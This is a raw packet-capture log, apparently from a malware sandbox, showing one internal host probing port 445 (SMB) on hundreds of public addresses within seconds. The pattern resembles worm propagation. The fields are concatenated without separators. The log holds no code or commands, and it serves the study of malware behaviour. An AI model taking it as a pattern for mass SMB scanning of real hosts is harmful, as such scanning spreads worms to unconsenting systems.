                                                        Dec 22, 2022 10:06:33.509116888 CET54198445192.168.2.534.175.167.117
                                                        Dec 22, 2022 10:06:33.509474039 CET54200445192.168.2.590.22.95.145
                                                        Dec 22, 2022 10:06:33.509816885 CET54203445192.168.2.5139.24.99.191
                                                        Dec 22, 2022 10:06:33.510382891 CET54204445192.168.2.58.54.205.222
                                                        Dec 22, 2022 10:06:33.511073112 CET54205445192.168.2.546.143.70.167
                                                        Dec 22, 2022 10:06:33.511507034 CET54206445192.168.2.543.125.152.66
                                                        Dec 22, 2022 10:06:33.511660099 CET54207445192.168.2.588.218.188.2
                                                        Dec 22, 2022 10:06:33.884165049 CET54143445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:34.072581053 CET54210445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:34.087338924 CET54129445192.168.2.5142.219.19.82
                                                        Dec 22, 2022 10:06:34.166393995 CET54212445192.168.2.541.203.13.78
                                                        Dec 22, 2022 10:06:34.244658947 CET4455421038.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:34.244803905 CET54210445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:34.244849920 CET54210445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:34.290504932 CET53078445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:06:34.306138039 CET54141445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:34.353364944 CET54213445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:34.416527033 CET4455421038.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:34.423639059 CET54210445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:34.501435995 CET44554213155.100.133.2192.168.2.5
                                                        Dec 22, 2022 10:06:34.501564026 CET54213445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:34.502335072 CET54215445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:34.572052002 CET54216445192.168.2.588.218.188.3
                                                        Dec 22, 2022 10:06:34.595403910 CET4455421038.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:34.595607042 CET54210445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:34.619167089 CET54218445192.168.2.5177.63.125.129
                                                        Dec 22, 2022 10:06:34.619326115 CET54219445192.168.2.522.244.71.84
                                                        Dec 22, 2022 10:06:34.619725943 CET54222445192.168.2.575.130.120.8
                                                        Dec 22, 2022 10:06:34.620434999 CET54223445192.168.2.5158.215.60.206
                                                        Dec 22, 2022 10:06:34.621395111 CET54224445192.168.2.516.240.79.29
                                                        Dec 22, 2022 10:06:34.621984005 CET54225445192.168.2.5180.153.146.95
                                                        Dec 22, 2022 10:06:34.622235060 CET54226445192.168.2.5192.216.77.224
                                                        Dec 22, 2022 10:06:34.622426033 CET54227445192.168.2.539.234.96.158
                                                        Dec 22, 2022 10:06:34.622728109 CET54229445192.168.2.52.218.76.132
                                                        Dec 22, 2022 10:06:34.623464108 CET54231445192.168.2.575.218.245.83
                                                        Dec 22, 2022 10:06:34.624162912 CET54232445192.168.2.5111.21.49.224
                                                        Dec 22, 2022 10:06:34.624552965 CET54235445192.168.2.5109.248.160.209
                                                        Dec 22, 2022 10:06:34.624680996 CET54236445192.168.2.5117.139.92.214
                                                        Dec 22, 2022 10:06:34.625008106 CET54239445192.168.2.5205.47.162.152
                                                        Dec 22, 2022 10:06:34.625267982 CET54242445192.168.2.5160.245.91.15
                                                        Dec 22, 2022 10:06:34.625439882 CET54243445192.168.2.585.191.7.51
                                                        Dec 22, 2022 10:06:34.625632048 CET54245445192.168.2.5156.35.229.123
                                                        Dec 22, 2022 10:06:34.625909090 CET54249445192.168.2.586.186.57.160
                                                        Dec 22, 2022 10:06:34.626013994 CET54250445192.168.2.559.227.138.198
                                                        Dec 22, 2022 10:06:34.626898050 CET54260445192.168.2.5179.176.88.109
                                                        Dec 22, 2022 10:06:34.627125025 CET54262445192.168.2.5171.184.241.230
                                                        Dec 22, 2022 10:06:34.627229929 CET54263445192.168.2.5201.159.205.211
                                                        Dec 22, 2022 10:06:34.627490044 CET54265445192.168.2.5160.126.254.218
                                                        Dec 22, 2022 10:06:34.627798080 CET54268445192.168.2.523.82.103.120
                                                        Dec 22, 2022 10:06:34.628031015 CET54271445192.168.2.5176.230.238.57
                                                        Dec 22, 2022 10:06:34.628277063 CET54274445192.168.2.518.138.15.186
                                                        Dec 22, 2022 10:06:34.654525995 CET44554215155.100.133.2192.168.2.5
                                                        Dec 22, 2022 10:06:34.654648066 CET54215445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:34.767399073 CET4455421038.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:34.822607040 CET54278445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:34.868634939 CET54143445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:34.931207895 CET54213445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:34.994743109 CET4455427838.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:34.994842052 CET54278445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:34.995001078 CET54278445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:34.996160030 CET54279445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:35.118628025 CET54215445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:35.165510893 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:35.166543007 CET4455427838.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:35.166615009 CET4455427838.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:35.168014050 CET4455427938.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:35.168098927 CET54279445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:35.168159008 CET54279445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:35.244152069 CET54281445192.168.2.541.203.13.79
                                                        Dec 22, 2022 10:06:35.340302944 CET4455427938.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:35.340435028 CET54279445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:35.353041887 CET54213445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:35.512073040 CET4455427938.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:35.519028902 CET54279445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:35.556313038 CET54215445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:35.650288105 CET54284445192.168.2.588.218.188.4
                                                        Dec 22, 2022 10:06:35.690807104 CET4455427938.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:35.751982927 CET54287445192.168.2.5175.46.157.215
                                                        Dec 22, 2022 10:06:35.751985073 CET54285445192.168.2.586.33.160.29
                                                        Dec 22, 2022 10:06:35.752389908 CET54290445192.168.2.543.7.168.239
                                                        Dec 22, 2022 10:06:35.752891064 CET54291445192.168.2.5221.21.105.35
                                                        Dec 22, 2022 10:06:35.753371000 CET54292445192.168.2.537.208.152.142
                                                        Dec 22, 2022 10:06:35.754015923 CET54293445192.168.2.548.232.160.150
                                                        Dec 22, 2022 10:06:35.754251003 CET54294445192.168.2.572.196.72.241
                                                        Dec 22, 2022 10:06:35.754333973 CET54295445192.168.2.565.101.41.213
                                                        Dec 22, 2022 10:06:35.754532099 CET54297445192.168.2.561.123.249.232
                                                        Dec 22, 2022 10:06:35.755042076 CET54298445192.168.2.582.88.34.19
                                                        Dec 22, 2022 10:06:35.755650997 CET54300445192.168.2.5202.99.88.67
                                                        Dec 22, 2022 10:06:35.756055117 CET54302445192.168.2.586.128.91.121
                                                        Dec 22, 2022 10:06:35.756150007 CET54304445192.168.2.565.4.59.76
                                                        Dec 22, 2022 10:06:35.756460905 CET54305445192.168.2.538.38.178.128
                                                        Dec 22, 2022 10:06:35.756820917 CET54309445192.168.2.5103.229.152.61
                                                        Dec 22, 2022 10:06:35.756983042 CET54311445192.168.2.5187.14.234.247
                                                        Dec 22, 2022 10:06:35.757123947 CET54312445192.168.2.548.104.250.167
                                                        Dec 22, 2022 10:06:35.757592916 CET54317445192.168.2.522.82.33.27
                                                        Dec 22, 2022 10:06:35.757781029 CET54318445192.168.2.517.152.199.28
                                                        Dec 22, 2022 10:06:35.758603096 CET54327445192.168.2.5139.89.215.247
                                                        Dec 22, 2022 10:06:35.758879900 CET54329445192.168.2.5181.116.188.179
                                                        Dec 22, 2022 10:06:35.759140968 CET54331445192.168.2.559.108.49.173
                                                        Dec 22, 2022 10:06:35.759232998 CET54332445192.168.2.5173.207.97.223
                                                        Dec 22, 2022 10:06:35.760277033 CET54335445192.168.2.585.151.19.223
                                                        Dec 22, 2022 10:06:35.760582924 CET54339445192.168.2.5201.168.60.39
                                                        Dec 22, 2022 10:06:35.760921001 CET54342445192.168.2.5222.82.194.194
                                                        Dec 22, 2022 10:06:36.071871042 CET54129445192.168.2.5142.219.19.82
                                                        Dec 22, 2022 10:06:36.228254080 CET54213445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:36.307271957 CET54348445192.168.2.541.203.13.80
                                                        Dec 22, 2022 10:06:36.368732929 CET54141445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:36.493765116 CET54215445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:36.714756966 CET54351445192.168.2.588.218.188.5
                                                        Dec 22, 2022 10:06:36.838524103 CET54143445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:36.856471062 CET54353445192.168.2.5135.73.87.250
                                                        Dec 22, 2022 10:06:36.856919050 CET54354445192.168.2.511.19.211.243
                                                        Dec 22, 2022 10:06:36.856955051 CET54355445192.168.2.5153.4.148.162
                                                        Dec 22, 2022 10:06:36.857095957 CET54357445192.168.2.5218.138.199.5
                                                        Dec 22, 2022 10:06:36.857363939 CET54361445192.168.2.5197.183.187.57
                                                        Dec 22, 2022 10:06:36.857403040 CET54362445192.168.2.5187.37.35.123
                                                        Dec 22, 2022 10:06:36.857505083 CET54363445192.168.2.561.34.143.36
                                                        Dec 22, 2022 10:06:36.857706070 CET54366445192.168.2.5191.179.27.250
                                                        Dec 22, 2022 10:06:36.857800961 CET54368445192.168.2.556.132.233.133
                                                        Dec 22, 2022 10:06:36.857876062 CET54369445192.168.2.5133.39.134.133
                                                        Dec 22, 2022 10:06:36.858098030 CET54374445192.168.2.590.190.147.1
                                                        Dec 22, 2022 10:06:36.858145952 CET54375445192.168.2.563.242.87.211
                                                        Dec 22, 2022 10:06:36.858584881 CET54383445192.168.2.5219.174.118.151
                                                        Dec 22, 2022 10:06:36.858686924 CET54386445192.168.2.539.162.164.229
                                                        Dec 22, 2022 10:06:36.858908892 CET54389445192.168.2.5214.75.17.163
                                                        Dec 22, 2022 10:06:36.858948946 CET54388445192.168.2.5139.4.32.23
                                                        Dec 22, 2022 10:06:36.859025002 CET54391445192.168.2.5214.109.183.100
                                                        Dec 22, 2022 10:06:36.859064102 CET54390445192.168.2.525.181.224.190
                                                        Dec 22, 2022 10:06:36.860632896 CET54395445192.168.2.540.59.146.158
                                                        Dec 22, 2022 10:06:36.860831976 CET54396445192.168.2.5143.148.94.200
                                                        Dec 22, 2022 10:06:36.861120939 CET54398445192.168.2.598.73.171.121
                                                        Dec 22, 2022 10:06:36.861129045 CET54399445192.168.2.534.134.23.134
                                                        Dec 22, 2022 10:06:36.861223936 CET54397445192.168.2.5215.220.93.238
                                                        Dec 22, 2022 10:06:36.869946003 CET54405445192.168.2.5176.64.228.29
                                                        Dec 22, 2022 10:06:36.869951963 CET54402445192.168.2.549.198.204.235
                                                        Dec 22, 2022 10:06:36.869957924 CET54409445192.168.2.5104.163.251.233
                                                        Dec 22, 2022 10:06:37.369117975 CET54415445192.168.2.541.203.13.81
                                                        Dec 22, 2022 10:06:37.749531984 CET44554129142.219.19.82192.168.2.5
                                                        Dec 22, 2022 10:06:37.749568939 CET44554129142.219.19.82192.168.2.5
                                                        Dec 22, 2022 10:06:37.749592066 CET44554129142.219.19.82192.168.2.5
                                                        Dec 22, 2022 10:06:37.791706085 CET54418445192.168.2.588.218.188.6
                                                        Dec 22, 2022 10:06:37.931188107 CET44554141142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:37.931220055 CET44554141142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:37.931241035 CET44554141142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:37.947289944 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:37.963382006 CET54419445192.168.2.5175.233.3.159
                                                        Dec 22, 2022 10:06:37.963385105 CET54420445192.168.2.5133.126.121.160
                                                        Dec 22, 2022 10:06:37.963473082 CET54421445192.168.2.5129.37.45.11
                                                        Dec 22, 2022 10:06:37.963649988 CET54423445192.168.2.535.244.13.200
                                                        Dec 22, 2022 10:06:37.963967085 CET54427445192.168.2.5144.55.82.240
                                                        Dec 22, 2022 10:06:37.964046001 CET54428445192.168.2.543.62.40.112
                                                        Dec 22, 2022 10:06:37.964149952 CET54429445192.168.2.5185.140.129.12
                                                        Dec 22, 2022 10:06:37.964375019 CET54432445192.168.2.516.69.219.39
                                                        Dec 22, 2022 10:06:37.964525938 CET54434445192.168.2.5163.14.242.244
                                                        Dec 22, 2022 10:06:37.964602947 CET54435445192.168.2.5169.80.244.101
                                                        Dec 22, 2022 10:06:37.964966059 CET54440445192.168.2.5151.49.70.15
                                                        Dec 22, 2022 10:06:37.965059042 CET54441445192.168.2.599.70.200.193
                                                        Dec 22, 2022 10:06:37.965677023 CET54450445192.168.2.56.157.196.7
                                                        Dec 22, 2022 10:06:37.966088057 CET54452445192.168.2.573.103.83.218
                                                        Dec 22, 2022 10:06:37.966252089 CET54454445192.168.2.5105.4.178.4
                                                        Dec 22, 2022 10:06:37.966345072 CET54455445192.168.2.5144.173.209.68
                                                        Dec 22, 2022 10:06:37.966445923 CET54456445192.168.2.5207.217.9.210
                                                        Dec 22, 2022 10:06:37.966573000 CET54457445192.168.2.5135.81.119.119
                                                        Dec 22, 2022 10:06:37.969239950 CET54462445192.168.2.5148.20.21.27
                                                        Dec 22, 2022 10:06:37.969239950 CET54463445192.168.2.5195.114.20.226
                                                        Dec 22, 2022 10:06:37.969434023 CET54464445192.168.2.588.75.173.196
                                                        Dec 22, 2022 10:06:37.969451904 CET54465445192.168.2.575.56.3.164
                                                        Dec 22, 2022 10:06:37.969599962 CET54466445192.168.2.540.249.49.69
                                                        Dec 22, 2022 10:06:37.978269100 CET54213445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:37.994431973 CET54470445192.168.2.5104.35.193.178
                                                        Dec 22, 2022 10:06:37.994812965 CET54474445192.168.2.524.108.44.225
                                                        Dec 22, 2022 10:06:37.995300055 CET54479445192.168.2.5156.248.179.27
                                                        Dec 22, 2022 10:06:38.115375042 CET44554143142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:38.115412951 CET44554143142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:38.115436077 CET44554143142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:38.353327036 CET54215445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:38.432003021 CET54483445192.168.2.541.203.13.82
                                                        Dec 22, 2022 10:06:38.698126078 CET54485445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:38.869771004 CET4455448538.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:38.869785070 CET54487445192.168.2.588.218.188.7
                                                        Dec 22, 2022 10:06:38.870112896 CET54485445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:38.870445967 CET54485445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:39.041783094 CET4455448538.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:39.041934967 CET54485445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:39.072462082 CET54489445192.168.2.5104.32.58.90
                                                        Dec 22, 2022 10:06:39.072669029 CET54491445192.168.2.5180.204.112.159
                                                        Dec 22, 2022 10:06:39.072674990 CET54490445192.168.2.5134.33.6.157
                                                        Dec 22, 2022 10:06:39.072726011 CET54492445192.168.2.5129.47.138.102
                                                        Dec 22, 2022 10:06:39.072891951 CET54494445192.168.2.564.76.195.241
                                                        Dec 22, 2022 10:06:39.072998047 CET54496445192.168.2.535.200.117.124
                                                        Dec 22, 2022 10:06:39.073220015 CET54500445192.168.2.548.26.222.179
                                                        Dec 22, 2022 10:06:39.073303938 CET54501445192.168.2.573.213.101.130
                                                        Dec 22, 2022 10:06:39.073472023 CET54504445192.168.2.5151.172.142.220
                                                        Dec 22, 2022 10:06:39.073539019 CET54505445192.168.2.528.247.23.50
                                                        Dec 22, 2022 10:06:39.073739052 CET54506445192.168.2.5143.217.26.5
                                                        Dec 22, 2022 10:06:39.073985100 CET54510445192.168.2.5174.98.223.201
                                                        Dec 22, 2022 10:06:39.074156046 CET54513445192.168.2.587.75.132.161
                                                        Dec 22, 2022 10:06:39.074562073 CET54521445192.168.2.5104.74.172.161
                                                        Dec 22, 2022 10:06:39.074770927 CET54523445192.168.2.5195.231.18.116
                                                        Dec 22, 2022 10:06:39.074826956 CET54524445192.168.2.5135.145.132.83
                                                        Dec 22, 2022 10:06:39.075045109 CET54526445192.168.2.5149.248.216.167
                                                        Dec 22, 2022 10:06:39.075110912 CET54527445192.168.2.5150.59.80.202
                                                        Dec 22, 2022 10:06:39.077353954 CET54531445192.168.2.5216.226.78.59
                                                        Dec 22, 2022 10:06:39.077434063 CET54532445192.168.2.515.221.123.32
                                                        Dec 22, 2022 10:06:39.077478886 CET54533445192.168.2.515.17.203.127
                                                        Dec 22, 2022 10:06:39.077503920 CET54534445192.168.2.553.176.52.104
                                                        Dec 22, 2022 10:06:39.077538967 CET54535445192.168.2.5185.145.24.81
                                                        Dec 22, 2022 10:06:39.101564884 CET44554526149.248.216.167192.168.2.5
                                                        Dec 22, 2022 10:06:39.101696014 CET54526445192.168.2.5149.248.216.167
                                                        Dec 22, 2022 10:06:39.101871967 CET54526445192.168.2.5149.248.216.167
                                                        Dec 22, 2022 10:06:39.102128029 CET54537445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:39.103867054 CET54540445192.168.2.5105.86.183.190
                                                        Dec 22, 2022 10:06:39.104187012 CET54544445192.168.2.5190.187.238.180
                                                        Dec 22, 2022 10:06:39.104607105 CET54549445192.168.2.575.127.174.189
                                                        Dec 22, 2022 10:06:39.128540039 CET44554537149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:39.128812075 CET54537445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:39.128812075 CET54537445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:39.129173994 CET54550445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:39.130980015 CET44554526149.248.216.167192.168.2.5
                                                        Dec 22, 2022 10:06:39.155958891 CET44554550149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:39.156068087 CET54550445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:39.156137943 CET54550445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:39.156395912 CET44554537149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:39.156737089 CET54537445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:39.182516098 CET44554550149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:39.182555914 CET44554550149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:39.213270903 CET4455448538.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:39.213432074 CET54485445192.168.2.538.35.118.9
                                                        Dec 22, 2022 10:06:39.384706020 CET4455448538.35.118.9192.168.2.5
                                                        Dec 22, 2022 10:06:39.448914051 CET54553445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:39.502502918 CET54554445192.168.2.541.203.13.83
                                                        Dec 22, 2022 10:06:39.620318890 CET4455455338.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:39.620461941 CET54553445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:39.620738029 CET54553445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:39.621753931 CET54556445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:39.792051077 CET4455455338.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:39.792082071 CET4455455338.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:39.793735981 CET4455455638.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:39.793911934 CET54556445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:39.793943882 CET54556445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:39.931962013 CET54558445192.168.2.588.218.188.8
                                                        Dec 22, 2022 10:06:39.965869904 CET4455455638.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:39.966250896 CET54556445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:40.137818098 CET4455455638.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:40.140610933 CET54556445192.168.2.538.35.118.10
                                                        Dec 22, 2022 10:06:40.182087898 CET54561445192.168.2.5168.225.98.12
                                                        Dec 22, 2022 10:06:40.182243109 CET54562445192.168.2.528.108.104.224
                                                        Dec 22, 2022 10:06:40.182694912 CET54565445192.168.2.510.19.5.38
                                                        Dec 22, 2022 10:06:40.182913065 CET54567445192.168.2.554.196.34.191
                                                        Dec 22, 2022 10:06:40.183201075 CET54570445192.168.2.584.229.153.26
                                                        Dec 22, 2022 10:06:40.183347940 CET54571445192.168.2.567.151.168.137
                                                        Dec 22, 2022 10:06:40.184063911 CET54575445192.168.2.5191.22.249.50
                                                        Dec 22, 2022 10:06:40.184072971 CET54574445192.168.2.563.172.126.171
                                                        Dec 22, 2022 10:06:40.184178114 CET54576445192.168.2.596.44.182.71
                                                        Dec 22, 2022 10:06:40.184700012 CET54581445192.168.2.592.62.149.171
                                                        Dec 22, 2022 10:06:40.184967995 CET54583445192.168.2.572.71.157.196
                                                        Dec 22, 2022 10:06:40.185385942 CET54592445192.168.2.5165.185.201.11
                                                        Dec 22, 2022 10:06:40.185497999 CET54593445192.168.2.5174.159.189.89
                                                        Dec 22, 2022 10:06:40.185518980 CET54594445192.168.2.5129.3.188.205
                                                        Dec 22, 2022 10:06:40.185643911 CET54596445192.168.2.599.71.67.221
                                                        Dec 22, 2022 10:06:40.186055899 CET54602445192.168.2.537.131.37.58
                                                        Dec 22, 2022 10:06:40.186062098 CET54601445192.168.2.57.194.237.123
                                                        Dec 22, 2022 10:06:40.187829971 CET54603445192.168.2.555.132.5.93
                                                        Dec 22, 2022 10:06:40.187975883 CET54604445192.168.2.512.31.213.202
                                                        Dec 22, 2022 10:06:40.188033104 CET54606445192.168.2.565.152.117.117
                                                        Dec 22, 2022 10:06:40.188199997 CET54605445192.168.2.5189.248.119.172
                                                        Dec 22, 2022 10:06:40.188205957 CET54607445192.168.2.530.128.173.60
                                                        Dec 22, 2022 10:06:40.213289976 CET54611445192.168.2.5149.76.111.94
                                                        Dec 22, 2022 10:06:40.213474035 CET54616445192.168.2.541.150.38.212
                                                        Dec 22, 2022 10:06:40.213625908 CET54619445192.168.2.5147.226.14.234
                                                        Dec 22, 2022 10:06:40.312653065 CET4455455638.35.118.10192.168.2.5
                                                        Dec 22, 2022 10:06:40.558516026 CET54623445192.168.2.541.203.13.84
                                                        Dec 22, 2022 10:06:40.996795893 CET54626445192.168.2.588.218.188.9
                                                        Dec 22, 2022 10:06:41.042732954 CET4455462688.218.188.9192.168.2.5
                                                        Dec 22, 2022 10:06:41.126102924 CET54628445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:41.292005062 CET44554628142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:41.292129993 CET54628445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:41.292177916 CET54628445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:41.307142973 CET54630445192.168.2.5170.178.60.33
                                                        Dec 22, 2022 10:06:41.307281017 CET54631445192.168.2.5118.135.153.45
                                                        Dec 22, 2022 10:06:41.307487011 CET54633445192.168.2.557.3.104.129
                                                        Dec 22, 2022 10:06:41.307586908 CET54636445192.168.2.5179.130.65.168
                                                        Dec 22, 2022 10:06:41.307725906 CET54638445192.168.2.5140.130.172.8
                                                        Dec 22, 2022 10:06:41.308017969 CET54640445192.168.2.5175.61.155.156
                                                        Dec 22, 2022 10:06:41.308242083 CET54643445192.168.2.5182.122.82.201
                                                        Dec 22, 2022 10:06:41.308274031 CET54644445192.168.2.511.69.133.236
                                                        Dec 22, 2022 10:06:41.308346987 CET54645445192.168.2.589.30.28.19
                                                        Dec 22, 2022 10:06:41.308583975 CET54649445192.168.2.5160.152.120.18
                                                        Dec 22, 2022 10:06:41.308690071 CET54651445192.168.2.5135.181.47.124
                                                        Dec 22, 2022 10:06:41.309127092 CET54661445192.168.2.5122.231.53.53
                                                        Dec 22, 2022 10:06:41.309202909 CET54662445192.168.2.587.107.54.205
                                                        Dec 22, 2022 10:06:41.309258938 CET54663445192.168.2.58.150.236.252
                                                        Dec 22, 2022 10:06:41.309640884 CET54670445192.168.2.5164.10.58.97
                                                        Dec 22, 2022 10:06:41.309650898 CET54664445192.168.2.5133.196.30.181
                                                        Dec 22, 2022 10:06:41.309681892 CET54671445192.168.2.5203.60.39.160
                                                        Dec 22, 2022 10:06:41.311636925 CET54672445192.168.2.580.148.218.167
                                                        Dec 22, 2022 10:06:41.311722040 CET54673445192.168.2.5139.17.165.186
                                                        Dec 22, 2022 10:06:41.311830044 CET54675445192.168.2.5161.128.252.103
                                                        Dec 22, 2022 10:06:41.311948061 CET54674445192.168.2.556.48.106.134
                                                        Dec 22, 2022 10:06:41.312275887 CET54676445192.168.2.554.66.110.22
                                                        Dec 22, 2022 10:06:41.323132992 CET54677445192.168.2.57.75.187.13
                                                        Dec 22, 2022 10:06:41.323630095 CET54680445192.168.2.599.54.132.212
                                                        Dec 22, 2022 10:06:41.324280024 CET54685445192.168.2.598.216.137.184
                                                        Dec 22, 2022 10:06:41.463057041 CET54213445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:41.556723118 CET54626445192.168.2.588.218.188.9
                                                        Dec 22, 2022 10:06:41.602377892 CET4455462688.218.188.9192.168.2.5
                                                        Dec 22, 2022 10:06:41.635267019 CET54692445192.168.2.541.203.13.85
                                                        Dec 22, 2022 10:06:41.744251013 CET54628445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:42.057629108 CET54696445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.072408915 CET54215445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:06:42.108913898 CET4455469688.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.109096050 CET54696445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.109201908 CET54696445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.110011101 CET54697445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.155760050 CET4455469688.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.156397104 CET4455469688.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.157180071 CET4455469788.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.157270908 CET54697445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.157315969 CET54697445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.198270082 CET54698445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:42.203927040 CET4455469788.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.204049110 CET54697445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.224863052 CET44554698149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:42.225018978 CET54698445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:42.235090017 CET54698445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:42.250444889 CET4455469788.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.250627995 CET54697445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.252283096 CET44554698149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:42.252396107 CET54698445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:42.252435923 CET54698445192.168.2.5149.248.216.1
                                                        Dec 22, 2022 10:06:42.261693001 CET44554698149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:42.285497904 CET44554698149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:42.285541058 CET44554698149.248.216.1192.168.2.5
                                                        Dec 22, 2022 10:06:42.291152000 CET54628445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:42.296859026 CET4455469788.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.299671888 CET54697445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.309504986 CET54701445192.168.2.5149.248.216.2
                                                        Dec 22, 2022 10:06:42.336105108 CET44554701149.248.216.2192.168.2.5
                                                        Dec 22, 2022 10:06:42.339648962 CET54701445192.168.2.5149.248.216.2
                                                        Dec 22, 2022 10:06:42.343116045 CET54701445192.168.2.5149.248.216.2
                                                        Dec 22, 2022 10:06:42.344165087 CET54702445192.168.2.5149.248.216.2
                                                        Dec 22, 2022 10:06:42.345901012 CET4455469788.218.188.10192.168.2.5
                                                        Dec 22, 2022 10:06:42.346122026 CET54697445192.168.2.588.218.188.10
                                                        Dec 22, 2022 10:06:42.370148897 CET44554701149.248.216.2192.168.2.5
